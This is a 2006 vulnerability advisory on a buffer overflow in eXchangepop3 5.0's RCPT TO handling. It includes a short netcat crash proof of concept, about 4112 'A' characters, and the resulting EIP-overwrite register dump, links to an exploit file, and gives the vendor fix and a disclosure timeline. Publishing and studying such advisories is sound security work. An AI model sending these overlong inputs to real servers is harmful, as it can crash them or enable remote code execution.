Exchangepop3 rcpt buffer overflow vulnerability

[<securma () morx org>]

Author: securma massine <securma () morx org>
MorX Security Research Team
http://www.morx.org

Product info :
EXchangepop3 is an email gateway (connector) that retrieves messages from 
Internet POP3 email accounts and delivers them to Exchange Server.
Vulnerability Description:
eXchangepop3 is vulnerable to buffer overflow attack.
boundary errors in the handling of the RCPT TO (smtp) commands by sending a 
large buffer, allow remote users to set a new Instruction Pointer to execute 
arbitrary code and gain access on system.

C:\>nc 127.0.0.1 25
220 aaa ESMTP
mail  [enter]
250 OK
rcpt to:<AAAAAA....("A"x4112)
we have :
eax=00000001 ebx=007334e0 ecx=41414141 edx=7c91eb94 esi=00455a38 
edi=0f010001
eip=41414141 esp=0221f750 ebp=00000001 iopl=0         nv up ei pl nz ac po 
nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000 
efl=00010216
41414141 ??               ???

Affected Software(s):
Exchangepop3 v 5.0 (build 050203)

Affected platform(s):
Windows

Exploit/Proof of Concept:
http://www.morx.org/expl5.txt

Solution :
The vendor has released a new build fixing the problem :
The build number is 060125.
http://www.exchangepop3.com/

History:
14/01/2006  initial vendor contact
16/01/2006  vendor received details about the vulnerabilty
02/02/2006  vendor released the fixed build

Disclaimer:
this entire document is for eductional, testing and demonstrating purpose 
only.

Greets:
Greets to undisputed and  all MorX members.